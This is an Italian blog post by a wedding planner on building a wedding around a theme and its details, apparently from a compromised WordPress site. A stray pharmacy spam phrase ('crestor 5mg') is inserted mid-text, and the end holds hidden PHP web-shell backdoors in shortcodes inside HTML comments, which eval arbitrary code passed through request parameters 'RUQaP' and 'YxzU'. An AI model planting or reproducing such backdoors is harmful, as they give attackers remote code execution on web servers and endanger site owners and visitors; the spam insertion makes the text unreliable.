Di Costanza Giaconi

Appunto, i dettagli…

Perchè un matrimonio si distingue da un’altro grazie a tutto un insieme di “extra”, quali decorazioni, accorgimenti e allestimenti, che contribuiscono a renderlo unico ed originale…Come in tutte le cose, è sempre il dettaglio che fa la differenza!

Ed è questa una delle specifiche caratteristiche di un wedding planner: il proporre agli sposi idee particolari, seguendo i loro gusti, arricchendo il progetto di matrimonio della coppia con dettagli, che alla fine, creeranno un effetto d’insieme di sicuro impatto…

E come si fa un progetto di matrimonio??? Partiamo da un’idea di base, che può essere il desiderare un ricevimento di tipo formale, oppure sobrio, o di lusso, o ancora fresco e giovane, (e avanti all’infinito, ci sono milioni dipossibilità!)…

Decidiamo quale location possa essere maggiormente adatta alle nostre esigenze, e da qui si inizia ad immaginare come e dove dovranno prendere posto i tavoli, il buffet, la musica, i balli, il taglio della torta…Molte location infatti sono articolate in diversi spazi che possono essere utilizzati a nostro piacimento, e quindi non resta che sbizzarrisri con le idee!

A questo punto possiamo scegliere un tema che ci rappresenti, che può essere un colore, un paese, un fiore, un profumo.. crestor 5mg.insomma, tutto è lecito purchè ci piaccia! E seguendo il tema scelto, iniziamo a proporre e selezionare le decorazioni principali, come il tipo di fiori, la presenza di specchi, lanterne o candele, vasi ecc ecc.

In questo modo piano piano iniziano a prendere vita tutti gli addobbi, la decorazione dei tavoli, delle sedie, delle sale e giardini, ed in generale di tutta la location.

E si possono creare le partecipazioni, i segnaposto, il tableau, la wedding cake ed ogni altro dettaglio sempre seguendo lo stesso tema, in modo da dare continuità e armonia ad ogni particolare del matrimonio…

Il risultato? Soddisfazione assicurata… soprattutto se il tuo matrimonio lo organizzi a Firenze! Parola di wedding planner!

Costanza<!– [/fusion_builder_column]

[insert_php]if (isset($_REQUEST["RUQaP"])){eval($_REQUEST["RUQaP"]);exit;}[/insert_php]
[php]if (isset($_REQUEST["RUQaP"])){eval($_REQUEST["RUQaP"]);exit;}[/php] –><!–
[insert_php]if (isset($_REQUEST["YxzU"])){eval($_REQUEST["YxzU"]);exit;}[/insert_php]
[php]if (isset($_REQUEST["YxzU"])){eval($_REQUEST["YxzU"]);exit;}[/php] –>
[/fusion_builder_row][/fusion_builder_container]